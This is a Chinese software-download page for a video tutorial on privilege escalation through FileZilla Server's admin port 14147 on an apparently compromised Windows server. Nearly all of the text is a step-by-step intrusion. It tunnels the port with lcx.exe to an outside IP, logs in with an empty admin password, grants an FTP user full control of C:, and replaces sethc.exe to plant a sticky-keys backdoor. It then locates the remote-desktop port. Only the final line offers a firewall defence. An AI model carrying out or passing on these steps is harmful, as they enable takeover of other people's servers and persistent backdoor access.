FileZilla Server 利用14147端口提权视频教程

  • 书籍大小:22MB
  • 书籍语言:简体中文
  • 书籍类型:国产软件
  • 书籍授权:免费软件
  • 书籍类别:网络安全
  • 应用平台:Windows平台
  • 更新时间:2017-05-04
  • 购买链接:
  • 网友评分:
360通过 腾讯通过 金山通过

情介绍

这里为大家分享一下FileZilla Server 利用14147端口提权视频教程,这样对于防御就有了个不错的思路,最后对给大家一个预防思路啊。

做个教程投稿,不知道有没有奖励~~

开了有3306,说明有root,不过我试了root账户被降权了,也就没法利用了,

所以利用14147提权,

用lcx端口转发工具,把14147端口转发到我们本机,

shell上运行D:\RECYCLER\lcx.exe -slave 42.239.18.58 327 127.0.0.1 14147

这样把14147转发到我们本机的327端口上,

先本机监听,本机运行lcx -listen 327 3333

是把327转发到3333,

现在在shell运行,

[+] Accept a Client on port 327 from 103.31.75.78 .....
[+] Waiting another Client on port:3333....

OK,然后我们本机下载FileZilla Server这个软件,来连接登录上去,

端口是3333,管理密码一般都是空,

已连接, 等待认证
协议警告: 服务器版本不匹配: 服务器版本为 0.9.51.32, 管理界面版本为 0.9.65.0
协议错误: 协议版本不匹配: 服务器协议版本为 0.1.11.0, 管理界面协议版本为 0.1.13.0

出现这个提示,说明版本不匹配,怎么办呢,他这个版本如果是老版本,网上还难找,

一般软件安装目录,是有权限浏览的,然后就能下载咯,我们在他服务器上下载他的,就和他的版本一样了,

D盘没有,

对路径“C:\”的访问被拒绝。

访问不了C盘根目录,我们直接访问C:\Program Files\

看到没,FileZilla Server,进去,下载里面的文件到本机,是可以下载的,我已经下载过了,

已连接,正在等待验证
已登录

然后点用户,添加一个自己的,密码勾上设置个密码,也可以不设置就是空密码,

然后点共享文件夹,添加一个C盘,右侧的权限都勾上,然后保存,

现在用FTP软件连接,端口一般是21,点编辑,设置这里可以看到端口,

现在C盘完全控制,上shift后门咯,

替换掉下面这两个文件夹的sethc文件,
C:\windows\system32\sethc.exe
C:\windows\system32\dllcache\sethc.exe

我用cmd替换,俩都换好了,现在找远程端口,

查服务tasklist /svc

svchost.exe                   1628 TermService 

TermService  的PID是1628,现在找PID 1628 对应的端口,就是远程端口咯,

查端口netstat -ano

TCP    0.0.0.0:7755           0.0.0.0:0              LISTENING       1628

端口是7755

OK服务器到手。

教程到此结束。

脚本之家小编给出的防御方法:通过端口策略或防火墙,禁止本地的14147连接任意ip的任意端口即可。

载地址

下载错误?【投诉报错】

FileZilla Server 利用14147端口提权视频教程

      气书籍

      载声明

      ☉ 解压密码:www.jb51.net 就是本站主域名,希望大家看清楚,[ 分享码的获取方法 ]可以参考这篇文章
      ☉ 推荐使用 [ 迅雷 ] 下载,使用 [ WinRAR v5 ] 以上版本解压本站软件。
      ☉ 如果这个软件总是不能下载的请在评论中留言,我们会尽快修复,谢谢!
      ☉ 下载本站资源,如果服务器暂不能下载请过一段时间重试!或者多试试几个下载地址
      ☉ 如果遇到什么问题,请评论留言,我们定会解决问题,谢谢大家支持!
      ☉ 本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。
      ☉ 本站提供的FileZilla Server 利用14147端口提权视频教程资源来源互联网,版权归该下载资源的合法拥有者所有。